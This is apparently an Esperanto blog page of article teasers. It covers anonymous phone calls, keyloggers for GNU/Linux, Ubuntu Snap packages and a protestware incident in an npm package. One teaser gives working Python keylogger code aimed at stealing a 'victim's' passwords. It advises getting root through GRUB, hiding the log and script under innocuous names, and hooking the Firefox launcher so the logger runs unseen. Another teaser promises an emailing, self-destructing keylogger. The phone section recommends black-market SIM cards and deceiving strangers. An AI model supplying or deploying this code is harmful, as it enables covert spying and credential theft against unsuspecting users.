Kiel anonime telefoni

1-a metodo: pruntepreni poŝtelefonon

Simpla maniero telefoni estas pruntepreni poŝtelefonon de homo sur la strato. Se vi ĝentile demandas, konvinkas rin pri tio, ke vi ne havas vian poŝtelefonon kun vi kaj ke estas urĝaĵo, verŝajne vi ne havos problemon. Se vi havas problemon, alia eblo estas oferi ion kontraŭ la favoro.

Vi devas scii, ke la telefona sistema ne privatecas. Interrete vi povas ĉifre telefoni per VPN-oj kaj Tor por havi pli da privateco.

Vokoj povas esti registritaj de la telofonaj firmaoj kaj spionaj agentejoj, do se vi bezonas multege da privateco, vi povas distordi la voĉon. Se vi timas, ke la persono, kiu lasis al vi la telefonon, malkaŝos al iu informojn rilatajn al via identeco (vizaĝajn trajtojn, altecon, ktp.), vi povas protekti vin ŝanĝante vian aspekton, kutimajn vestaĵojn kaj altecon por la voko (uzante kolorajn kontaktlensojn, platformajn ŝuojn aŭ altajn kalkanumojn, razante vian barbon aŭ lasante ĝin kreski, ŝanĝante vian hararanĝon, ktp.) Se vi bezonas pli da privateco, vi povas peti al alia persono fari la vokon por vi.

2-a metodo: anonime akiri SIM-karton

En multaj landoj oni bezonas doni siajn personajn informojn por aĉeti SIM-karton. Eblas eviti tiun limigon aĉetante ĝin en la nigra merkato. Alia maniero estas konvinki homon, kiu ne konas vi, aĉeti por vi karton kontraŭ mono.

Enigante la karton en stulta telefono aŭ telefono kun sekura operaciumo, vi povos telefoni, sen ke la vokoj estu ligitaj al via vera identeco. Denove, se vi bezonas multege da privateco, estu singarda: ne forgesu distordi la voĉon; telefoni en loko, kie vi ne ofte troviĝas; forigi la vokon de la historio, ktp. Legu plu el Kiel anonime telefoni

Klavaroregistrilo (keylogger) por GNU/Linukso. Retpoŝte sendi informojn kaj detruiĝi

En ĉi tiu artikolo mi montras al vi kiel programi klavaroregistrilon, kiu sendas mesaĝojn per retpoŝto kaj detruiĝas post difinita dato.

Legu plu el Klavaroregistrilo (keylogger) por GNU/Linukso. Retpoŝte sendi informojn kaj detruiĝi

Baza klavaroregistrilo (keylogger) por GNU/Linukso. Ŝteli pasvortojn kaj tajpitajn informojn

Simpla maniero ŝteli pasvortojn estas instali klavaroregistrilon (keylogger) en la komputilo de nia viktimo. Mi montros kiel fari tion en GNU/Linukso per la Python-programlingvo.

Unue ni devas akiri permesojn de ĉefuzanto. Se la komputilo estas administrita de ni, ni jam scias la pasvorton. Se tio ne estas nia okazo, ni povas akiri aliron de ĉefuzanto per GRUB. Per la necesaj permesoj ni jam povas instali la klavaroregistrilon.

Unue, oni devas instali la pynput-bibliotekon per...

sudo pip install pynput

Sekve ni devas skribi la klavaroregistrilon. Jen la kodo, kiun ni uzos:

#!/usr/bin/env python3
from pynput.keyboard import Key, Listener
import logging

log_dir = "/usr/share/doc/python3/"

logging.basicConfig(filename=(log_dir + "log"), \
        level=logging.DEBUG, format='%(asctime)s: %(message)s')

def on_press(key):
    logging.info(str(key))

with Listener(on_press=on_press) as listener:
    listener.join()

La klavaroregistrilo konserviĝas en log_dir. Mi, ĉi-okaze, specifis la dokumentaran dosieron de Python 3 en GNU/Linukso. Ni ankaŭ povas konservi la klavaroregistrilon en tiun dosierujon, eble uzante la nomon compile_docs.py aŭ iun similan, por ne altiri la atenton. Plej bone estas elekti dosierujon, kiun la viktimo ne eniros, por eviti, ke ri ne rimarku tion, kion ni faras.

Fine ni devus plenumi la programon ĉiam, kiam oni ŝaltu la komputilon aŭ programo estu plenumita, sen ke la viktimo rimarku. Se, ekzemple, ni volas startigi la klavaroregistrilon ĉiam, kiam la uzanto malfermu Firefox-on, ni povas modifi la Firefox-komandon. Legu plu el Baza klavaroregistrilo (keylogger) por GNU/Linukso. Ŝteli pasvortojn kaj tajpitajn informojn

Snap-oj en Ubuntu: malpli da sekureco kaj aŭtomataj ĝisdatigoj

Per sia versio 22.04, kiu estos eldonita la 21an de aprilo, Ubuntu igos, ke programoj uzu Snap-pakojn anstataŭ la .deb-aj. Tiuj pakoj aŭtomate ĝisdatiĝas sen iri tra prova fazo kiel okazas kun la pakoj de Debiano kaj aliaj distribuoj. En la kazo de la pako de Firefox, estas la skipo de Mozilla (ne Ubuntu), kiu decidas kiel kaj kiam la retumilo ĝisdatiĝas.

Firefox estas libera programaro, sed ĝi enhavas proprieterojn kiel Pocket. Mozilla povas per Snap aldoni aliajn similajn erojn kaj malagrablajn funkciojn.

La Snap-oj havas iujn avantaĝojn: ili permesas paki programon kun ĉiuj iliaj dependaĵoj, ili funkcias en ĉiuj distribuoj, ktp. Tamen ili malrapidigas la startigan procezon; ili estas multe pli malrapidaj, kiam ili estas plenumitaj unuafoje; ili okupas pli da spaco, ĉar ili enhavas bibliotekojn, kiuj povus esti uzitaj de pluraj programoj; ilia defaŭlta deponejo («aĉetejo») estas proprieta; ili postulas la uzon de systemd, ktp.

Se la uzo de la Snap-oj estus nedeviga, ne estus tiom da polemiko, sed Ubuntu trudis ilin por kelkaj pakoj, por kiuj ne plu estas .deb-a alternativo.

Alia provizoĉena atako en npm: EventSource polyfill

npm jam pruvis esti malsekura pako-administrilo — lastatempe per la fiprogramaro de node-ipc —. Alia biblioteko tre uzata, elŝutita pli ol 600 000 fojoj semajne per npm, nomita EventSource polyfill aldonis propagandajn mesaĝojn skribitajn en la rusa favore al la ukraina reĝimo direktajn al tiuj, kiuj havas sian horzonon agorditan kiel regionon de Rusio, eĉ malfermante fenestron en la retumilo kun la URL de kolekto de subskriboj kontraŭ la milito.

Ĝi montras falsajn mensaĝojn kiel «91 % el la ukrainaj plene subtenas la prezidanton Volodimir Zelenskij», sed la partopreno en la 2019aj elektoj estis 49,84 % kaj la partio de tiu politikisto atingis entute 6 307 793 balotilojn (43,16 %). Ĝi ankaŭ rekomendas aliri al la ĵurnalo de la BCC (brita ŝtata ĵurnalo) per Tor (ĉar ĝi estas cenzurita en Rusio) kiel fidinda fondo de informo.